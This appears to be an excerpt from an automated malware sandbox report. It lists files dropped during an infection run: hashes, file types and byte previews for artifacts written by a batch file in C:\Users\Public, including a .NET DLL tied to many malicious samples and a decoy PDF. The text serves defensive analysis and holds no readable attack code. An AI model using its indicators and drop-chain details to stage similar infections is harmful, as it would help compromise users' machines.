                                                    SSDEEP:6:k7O6dyq2Pwkn2nKuAl9OmbnIFUtIO68jz1ZmwuO68jlRkwOwkn2nKuAl9OmbjLJ:kFgvYfHAahFUtQgz1/egz5JfHAaSJ
                                                    MD5:075E4815EC3FA097629300311270CA61
                                                    SHA1:BE49359B7E1B0118BDFD227DD1C0DD45A098B0B9
                                                    SHA-256:0AD5795C7F74F7C6D2C3A22F7704AAF5CDAAA801E4229E2B963FAA4D9106D5B5
                                                    SHA-512:F6006572AE65AD29511CB7CD0099121E17FFCF1979E872E126231E48121868E851FE4BB415B46BD664BBBA4C960EF98EFEC25BCC173E870E8DC9E2BC9149D1DD
                                                    Malicious:false
                                                    Preview:2023/06/01-12:14:45.253 1a14 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2023/06/01-12:14:45.254 1a14 Recovering log #3.2023/06/01-12:14:45.254 1a14 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                                    C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):131072
                                                    Entropy (8bit):0.008907738108328683
                                                    Encrypted:false
                                                    SSDEEP:3:ImtV/CuttMTLS/Jf0lt+urQTlD7vt/lcvmllP62/X:IiV1kTLLlousTxvv6m
                                                    MD5:0A339004BCB425813505AE2871E61E20
                                                    SHA1:9BDA040B5589E1B919A259DB212F4CE8E32AAA8F
                                                    SHA-256:46828E139BE167C9E36B556EB137571DE93A29930C366CE0666B1385BC106517
                                                    SHA-512:DA3CE56FFA0538D022A80F7F6DAE1E89586E27FC484E82CCCAADC9EE163BEBBEDA2CAB446D507C622BAE868086E382F5436E328418BB877FBBF0A2192CB61DF8
                                                    Malicious:false
                                                    Preview:VLnk.....?......).0k.....................................................................................................................................................................................................................................................U....n.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-230601101441Z-288.bmp

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                    File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                    Category:dropped
                                                    Size (bytes):65110
                                                    Entropy (8bit):0.6442903166717108
                                                    Encrypted:false
                                                    SSDEEP:96:6JiNp29ECmTTT8dePc4lDe/quy47rHMMMT8:CyCaT8UgB3
                                                    MD5:E0E44159B1CE64E3FBCA349002312A5A
                                                    SHA1:3E2C1142527A78285FCBE981250E07A6FB5C94E5
                                                    SHA-256:850CACAE25D1D93F40679BF94F801027CDB3DFDACA2CDFFBA2836EE0B19DCE44
                                                    SHA-512:EFC5A54E1A000DD4D38AC95EFA76412A2B4EF7E94A7B4C6AC20A8656551756D3D05A0323BB29CAC47008D71024300468B9B2A735CA16A23EC6DF1CEEC856E487
                                                    Malicious:false
                                                    Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3024000, file counter 16, database pages 15, cookie 0x5, schema 4, UTF-8, version-valid-for 16
                                                    Category:dropped
                                                    Size (bytes):61440
                                                    Entropy (8bit):3.568190540254072
                                                    Encrypted:false
                                                    SSDEEP:384:XeT9dThltELJ8fwRRwZsLRGlKhsvXh+vSc:mkYZsLQhUSc
                                                    MD5:B657D13FEAAB58370E45D550A49C8465
                                                    SHA1:086E22290B6A3B8E6BAC3737597FBB6C4C1BDACD
                                                    SHA-256:1738BF168C51FD120BDE504515EE50A7F91F99990BBF197282B27B16C8FEA324
                                                    SHA-512:AF659E40FFFD64E31408036EC725398B2A3B3872525C10E8A9BA0566BBEE66E26D7DED305C014EAB631C3697109D79514F33843E6493A91BA9D9498C05B77C17
                                                    Malicious:false
                                                    Preview:SQLite format 3......@ ..........................................................................$.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                    File Type:SQLite Rollback Journal
                                                    Category:dropped
                                                    Size (bytes):8720
                                                    Entropy (8bit):3.315974304477115
                                                    Encrypted:false
                                                    SSDEEP:48:7MY2iomVQYom1Cgiom8Vom1Nom1Aiom1RROiom1Com1pom1riomVKiomGwnqQlmu:7uCggOhPCK8nN49IVXEBodRBk4
                                                    MD5:56FC7D677AA825622EAB693ACB26CC60
                                                    SHA1:352645F7658F84A74CEEABBA0C3D7456CA663883
                                                    SHA-256:B37A2BF6317EE7D79A1C83719F191ACFDF9C54EF578ABBFA559290C5C0689FDE
                                                    SHA-512:9AF9A08A725FDF2EAE106CA453FBBF69DDE29FF5925513746C881C7F7F012DFAA242F34AA1318A14682232A3510C666DFC9820C1ACFB62A4D53597E05AD5689A
                                                    Malicious:false
                                                    Preview:.... .c......e6...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................W....<.W.L...y.......~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

                                                    Download File
                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):63598
                                                    Entropy (8bit):5.4331110334817385
                                                    Encrypted:false
                                                    SSDEEP:768:PCbGNFYGpiyVFiC0ZlZ71Hs3gkZX8S9VYRX4mKDGYyu:J0GpiyVFihlZ7Vs3bV04mkGK
                                                    MD5:E24CFA8DB27E76DD4411850C56EFEE5B
                                                    SHA1:E7D396D1BEA753474BCD86FB9E774052CF8E5B37
                                                    SHA-256:7E570368A392A2D6776E3AE5B139F0D0D105F15CC5C21624A5DCEEEDF5DB24FB
                                                    SHA-512:9A6F4122A0A01CC419B3CCF6E861532CD10F96222F275A2EBC4023A2E56FCE4FDB53AB44BB7EAFA607A5E30C3490414FDB755228CC0258A97AFEB82A2F72FA16
                                                    Malicious:false
                                                    Preview:4.382.88.FID.2:o:........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.94.FID.2:o:........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.82.FID.2:o:........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.93.FID.2:o:........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.107.FID.2:o:........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.103.FID.2:o:........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.116.FID.2:o:........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.75.FID.2:o:........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.89.FID.2:o:........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.85.FID.2:o:........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.98.FID.2:o:........:F:Arial-B

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Quarrelers.Cod

                                                    Download File
                                                    Process:C:\Users\Public\u5p3.bat
                                                    File Type:ASCII text, with very long lines (63174), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):63174
                                                    Entropy (8bit):2.6774097576064904
                                                    Encrypted:false
                                                    SSDEEP:768:3YEEGqhLpa+/YcynMY2/LX+OLugY5QzfsqHeWEEtKxla+2HfoiHdGhM0RSliNkWj:P+gnaLU6nHfOhJSAk9MN8ABC0riG
                                                    MD5:4A179C732FBA82188F2D1C207BFE228E
                                                    SHA1:D8A88AB76074671ED11A9636DBE6012A2B61C6C1
                                                    SHA-256:2ADE6C66A5BF036D8E9899ADE349C7A887BE41757A7004869E19A64AB2BD0B7E
                                                    SHA-512:D6200251DC566516FFD8601153022B0E8AAAFCED83CA2A95CB3F93E12E84DDFEC2FBC48CACFE49EBF34A25D5418FDEF154D31AB008BBA878B7B21E7D98FD81EF
                                                    Malicious:false
                                                    Preview:003000E9004E00000041000000484800D10000606000230000575700C10000006A6A00A0A0A0001717170000005C5C00A7000000F50000004C4C000028282800A70000A70070707070707000AF00DF00AFAF00EBEB00AF0000000000F00057001F008D8D002C2C2C0000000000606060606060600000800000E7000000320000003737007A7A0000606060606000007474740000000000262600BDBD008F0000F8F80051510033330000CC0000000000E3E300B00000BA0000000303009595959500B40054545454005700F600006C0000EA004A4A000D00001B1B1B1B000039000000000000737373730000AC004100000000002B0000202020202000858500CC000017005900003D0045450000006D00FE00000005050505000055555500000098000000AC00007E006200000900003D3D004F4F000000000000D6007D7D003D00000000000043430000007F007E00F600000000000000000000000041008E8E8E8E8E8E8E006F6F0035004B000000CA002C00130000000000000000AE00006000000000EB000000E700004D4D4D00AD0000330045454545450000000500A9A9008D8D0000D4000000ED00000000003D3D000000C1C1000000000B000000CACACACACACACA0047003232004E4E00000000F300000000003D00008E8E007F000E004545454500007B009C9C9C00000003030000

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\Postpyloric6.Ann

                                                    Download File
                                                    Process:C:\Users\Public\u5p3.bat
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):118233
                                                    Entropy (8bit):7.710808982633477
                                                    Encrypted:false
                                                    SSDEEP:3072:XO5UDdjGuQqD+lhBEfDhNTWYZwhVZqBEKwib7YuX3:LDddisbaY6hVZqBLdRX3
                                                    MD5:A7B2863D380B7FE3F8E99B4BF634B39F
                                                    SHA1:85595D001B815501BB91996BCAE34600ABA3C36E
                                                    SHA-256:65FE205CBE270540C6E67A3307C61EE18475062F36F8A5836B3958BD7E24F533
                                                    SHA-512:3403955017869C8A4602441B20EDC52EC9AFC26CA6FE3891309BEF8B2A4CDD7C4D50CC2DCE667467CC72044C01F729476772FE1B83EF2F4A5CFB3940A4BF7D9B
                                                    Malicious:false
                                                    Preview:...............................U..].........CCC.....2.4.....<.................4.......ddddddd.......w................DDDD....ttt..........................mm......v.x..............%.......}}.u.....................8................}.K.5...................g...u.......c............b.......ff....&&.........l.....................?...............h.......!..|......5......................................................T...4...yy.........................oo.....j..r.......V..D.....V..........................(......C..333............99..P..........******..JJ..iii.........m.$..........l..$..................................................8....ppppppp........~~~~..........QQQQ..n..M.....................[....GG.............gggggggggg..........===.6.........................C.................999......+.......222......0.y..............b.....!!..................U........[.zz..................7..................Z..........YY.......A.....|.....M........,,..LLL.1...KK.....H......PP......O..e....J.o.L.....|

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\Troubleshooting\Egueiite240\SharpDX.DXGI.dll

                                                    Download File
                                                    Process:C:\Users\Public\u5p3.bat
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):88064
                                                    Entropy (8bit):5.775805248630538
                                                    Encrypted:false
                                                    SSDEEP:1536:QFNovLGNuZPQtwhY4SFDivO5Ib6VU3x8sDKxq:QFNsLGNulhY4SG+xq
                                                    MD5:0EDD7743DB76D68D2E198F137E56360C
                                                    SHA1:76B0ACA1C410901C8399FBFDAC2AC36E80C4837C
                                                    SHA-256:F03C45B29D8DB5C2BD9461EFB834723C2F9C84A1FED921D9577BC0511AE0B86D
                                                    SHA-512:67716007A5771D3A45104CB0C3823EBAE58F39E91B5A8AA4653A6FD3E65162C824DF7E5944A123DA70F7739904EF46E43B7A7E1906BE95FB11CAE906673FBB58
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: zpeu.exe, Detection: malicious, Browse
                                                    • Filename: zpeu.exe, Detection: malicious, Browse
                                                    • Filename: as.ps1, Detection: malicious, Browse
                                                    • Filename: KwP6qU3cQ8.exe, Detection: malicious, Browse
                                                    • Filename: KwP6qU3cQ8.exe, Detection: malicious, Browse
                                                    • Filename: DB948GHBNJI.xlsx, Detection: malicious, Browse
                                                    • Filename: Order-new world foods.xlsx, Detection: malicious, Browse
                                                    • Filename: 8cAZneRN6B.exe, Detection: malicious, Browse
                                                    • Filename: 8cAZneRN6B.exe, Detection: malicious, Browse
                                                    • Filename: fr34veeTGm.exe, Detection: malicious, Browse
                                                    • Filename: fr34veeTGm.exe, Detection: malicious, Browse
                                                    • Filename: ShipmentReceipt9521368040.xlsx, Detection: malicious, Browse
                                                    • Filename: njUIPPVrud.exe, Detection: malicious, Browse
                                                    • Filename: njUIPPVrud.exe, Detection: malicious, Browse
                                                    • Filename: ShipmentReceipt93213628045.xlsx, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.O...........!.....N..........~m... ........@.. ...............................%....@.................................$m..W....................................l............................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B................`m......H........F...&...................E.......................................(....*..0................(....(......(....&.(...+*."..(....*...Z.~....(....-..s....*.*..0..6........{.........(.....{....M........ZXM)....(.......(.....*...0..D........{........,..o....+.~....(.....{....M........ZXM)....(.......(.....*.0..5..........{..........(.....{....M........ZXM)....(.........*....0..6..........{..........{....M........ZXM)....(..........(.....*...0..:.......s.......o......(......~.

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\bn.txt

                                                    Download File
                                                    Process:C:\Users\Public\u5p3.bat
                                                    File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):15062
                                                    Entropy (8bit):4.039346182307332
                                                    Encrypted:false
                                                    SSDEEP:192:iM+g4O23sZEstg+lTr++0Mx148IiZaXTXEU10bXYc+4/rexX4:iMyc2stg+lTr++0MQ8DZRDYc+4axI
                                                    MD5:D0E788F64268D15B4391F052B1F4B18A
                                                    SHA1:2FD8E0A9DD22A729D578536D560354C944C7C93E
                                                    SHA-256:216CC780E371DC318C8B15B84DE8A5EC0E28F712B3109A991C8A09CDDAA2A81A
                                                    SHA-512:D50EA673018472C17DB44B315F4C343A2924A2EAA95C668D1160AA3830533CA37CC13C2067911A0756F1BE8C41DF45669ABE083759DCB9436F98E90CBB6AC8BF
                                                    Malicious:false
                                                    Preview:.;!@Lang2@!UTF-8!..; 4.46 : Team Oruddho (Fahad Mohammad Shaon, Mahmud Hassan) : http://www.oruddho.com..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Bangla.........401..... ..................&.......&....&.... ................&...... .......440..&....... .... ........&...... .... .............. ......&........& .......&.............. ............... ..... .... ......?..500..&......&..................&..&.......&........&........540..&........ .....7-zip-. ........ ........... ........ .....&..........&............. ...

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\find-location-symbolic.svg

                                                    Download File
                                                    Process:C:\Users\Public\u5p3.bat
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):713
                                                    Entropy (8bit):4.445408002557924
                                                    Encrypted:false
                                                    SSDEEP:12:TMHdPnnl/nu3tlndL9+Wlz3MQFcWUio23kRqaM8UwYOWlz2Wlzm7Wlzi5WlzsbWW:2dPnnxu3tldLklFWUi/3kRqaRUZODv7R
                                                    MD5:9A5B1DB3C4E78A928BDB639BE46AA003
                                                    SHA1:595D3D9C7BB646CF607923AEBC3583B48F03B426
                                                    SHA-256:0C481D646B531DCBF2FCCE2A034CE6A202CAEEB1C17A591756CB3A08514AC9ED
                                                    SHA-512:CA5E59B27D89651DFE89868C2D0DF63EFE64AB4B3E0E49937CFC15E84610505E2378E29D716FB803BEF74C80D99D25E93B7D5E8D7B1BE3EF905A8C910011F47F
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <g fill="#2e3436">. <path d="m 11 8 c 0 1.65625 -1.34375 3 -3 3 s -3 -1.34375 -3 -3 s 1.34375 -3 3 -3 s 3 1.34375 3 3 z m 0 0"/>. <path d="m 8 1 c -3.851562 0 -7 3.144531 -7 7 s 3.148438 7 7 7 s 7 -3.144531 7 -7 s -3.148438 -7 -7 -7 z m 0 2 c 2.773438 0 5 2.230469 5 5 s -2.226562 4.996094 -5 4.996094 s -5 -2.226563 -5 -4.996094 s 2.226562 -5 5 -5 z m 0 0"/>. <path d="m 7 0 h 2 v 3 h -2 z m 0 0"/>. <path d="m 7 13 h 2 v 3 h -2 z m 0 0"/>. <path d="m 16 7 v 2 h -3 v -2 z m 0 0"/>. <path d="m 3 7 v 2 h -3 v -2 z m 0 0"/>. </g>.</svg>.

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth\network-cellular-symbolic.svg

                                                    Download File
                                                    Process:C:\Users\Public\u5p3.bat
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):441
                                                    Entropy (8bit):4.575285851859924
                                                    Encrypted:false
                                                    SSDEEP:12:t4CDqwqZo8nGGa6Smf+e9s/J7e3VN5IUavl+i:t4CGosm6Sle9s/Be3Vv+lN
                                                    MD5:79F668FBC971471D3CE930DD5B53F01D
                                                    SHA1:0A21641F8BDCA5C3DDAAA2224E80784BF1F3EE9A
                                                    SHA-256:8ECA65E299CCB64B2145263827EED45130336E01A4FB1F309C8A36E8751473D4
                                                    SHA-512:DFA0CD2923F83514181299F7374D553B2B427028E47BC2033E377850FD98121806EA370DEE64349AE410F84CC815E74AFF8E11227FCF21E2E1BF83BAA6BD2616
                                                    Malicious:false
                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16" height="16"><path d="M2 1c-1.261.98-2 2.833-2 5 0 2.127.777 4.005 2 5h1V9c-.607-.78-1-1.759-1-3s.393-2.211 1-3V1zm11 0v2c.607.789 1 1.759 1 3s-.393 2.22-1 3v2h1c1.223-.995 2-2.873 2-5 0-2.167-.739-4.02-2-5zM4 3c-.688.784-1 1.743-1 3s.328 2.163 1 3h1V3zm7 0v6h1c.672-.837 1-1.743 1-3s-.312-2.216-1-3zM8 4a2 2 0 100 4 2 2 0 000-4zm0 5a1 1 0 00-1 1v6h2v-6a1 1 0 00-1-1z" fill="#2e3436"/></svg>

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1196
                                                    Entropy (8bit):5.333915035046385
                                                    Encrypted:false
                                                    SSDEEP:24:3aZPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKJF9G:qZPerB4nqRL/HvFe9t4Cv94anG
                                                    MD5:B15D7C50C640BEF4A1E823CE568A5E5E
                                                    SHA1:E456E2EE754F8FBA38F8F75858491258896C9E41
                                                    SHA-256:A95974F134C10C31BF7B1243C3E5F3987F1CC878565E28182DEC577D552450C0
                                                    SHA-512:B7E7D0303E3DCF81217B7AC871AF1C4871D8BA19CC595DB35A6640108411126666D244D8CF91D766E129E7306FBCBA9622746DF74EC030E180CFDEDB78239107
                                                    Malicious:false
                                                    Preview:@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0pn21suu.a4h.ps1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j3znlbq5.weq.psm1

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:U:U
                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                    Malicious:false
                                                    Preview:1

                                                    C:\Users\user\AppData\Local\Temp\nsn12E4.tmp\System.dll

                                                    Download File
                                                    Process:C:\Users\Public\u5p3.bat
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):11776
                                                    Entropy (8bit):5.659384359264642
                                                    Encrypted:false
                                                    SSDEEP:192:ex24sihno00Wfl97nH6BenXwWobpWBTtvShJ5omi7dJWjOlESlS:h8QIl972eXqlWBFSt273YOlEz
                                                    MD5:8B3830B9DBF87F84DDD3B26645FED3A0
                                                    SHA1:223BEF1F19E644A610A0877D01EADC9E28299509
                                                    SHA-256:F004C568D305CD95EDBD704166FCD2849D395B595DFF814BCC2012693527AC37
                                                    SHA-512:D13CFD98DB5CA8DC9C15723EEE0E7454975078A776BCE26247228BE4603A0217E166058EBADC68090AFE988862B7514CB8CB84DE13B3DE35737412A6F0A8AC03
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....uY...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..`....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4DKC129NQCHJ2APP262Z.temp

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6205
                                                    Entropy (8bit):3.7558539085235183
                                                    Encrypted:false
                                                    SSDEEP:96:kTm99P0C96qekvhkvCCtS5SHc095SHc0r:wm99h5KSf09f0r
                                                    MD5:A251848173937F65CB89F04189D363E4
                                                    SHA1:EEDE60F73076CE5A85430261499A82679E4EB909
                                                    SHA-256:15DD0D94E1F1B31F27A70AD1F16B4277EECA307ECB690EC6622D9D33643965B5
                                                    SHA-512:3EEE0B8CFE09D09456B9251ED137742100121B295E5FCE44D0CCFA3D8E9EBE2D5B7AD0A8E19CCF8C92F656BA4F4F0EEFAF7DFA0AAF495CBDDE078516DCADAE1E
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-..9).0v....3..q.......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...V.Q.....Y....................yN|.A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...V.Q.....Y.....................K..R.o.a.m.i.n.g.....\.1......U3m..MICROS~1..D.......N...V.Q.....Y........................M.i.c.r.o.s.o.f.t.....V.1......Utm..Windows.@.......N...V.Q.....Y........................W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N...V.Q.....Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N...V.Q.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N...U.f.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........

                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):6205
                                                    Entropy (8bit):3.7558539085235183
                                                    Encrypted:false
                                                    SSDEEP:96:kTm99P0C96qekvhkvCCtS5SHc095SHc0r:wm99h5KSf09f0r
                                                    MD5:A251848173937F65CB89F04189D363E4
                                                    SHA1:EEDE60F73076CE5A85430261499A82679E4EB909
                                                    SHA-256:15DD0D94E1F1B31F27A70AD1F16B4277EECA307ECB690EC6622D9D33643965B5
                                                    SHA-512:3EEE0B8CFE09D09456B9251ED137742100121B295E5FCE44D0CCFA3D8E9EBE2D5B7AD0A8E19CCF8C92F656BA4F4F0EEFAF7DFA0AAF495CBDDE078516DCADAE1E
                                                    Malicious:false
                                                    Preview:...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-..9).0v....3..q.......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...V.Q.....Y....................yN|.A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...V.Q.....Y.....................K..R.o.a.m.i.n.g.....\.1......U3m..MICROS~1..D.......N...V.Q.....Y........................M.i.c.r.o.s.o.f.t.....V.1......Utm..Windows.@.......N...V.Q.....Y........................W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N...V.Q.....Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N...V.Q.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N...U.f.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........

                                                    C:\Users\user\Desktop\List of required items and services.pdf

                                                    Download File
                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PDF document, version 1.7 (zip deflate encoded)
                                                    Category:dropped
                                                    Size (bytes):653248
                                                    Entropy (8bit):7.983402816932296
                                                    Encrypted:false
                                                    SSDEEP:12288:Z5j8QLfikr2uyiCDVvzDFgONPYpKE7nmP4II3xHjK4HTbuSGxEw6:H8QbZ2upCDtuOQKE7nmA3xWYT6LT6
                                                    MD5:9B05142184F080AE36983D0A25597143
                                                    SHA1:6421CD63995163132E89709FF70D695825A3CBDC
                                                    SHA-256:F16B7347BCAADA09E4A85E92A704CCC67F413DDBA62BBDF4BBE14A7B687AC455
                                                    SHA-512:EBDB6D9682A0DAC526214D9E5173E0CF627D1E538F2A728768E913FD2CE94B926DA6A248DFB5AE6D1DFAF0CE33807D3007D05785BE200687C55B926DCE6908DC
                                                    Malicious:false
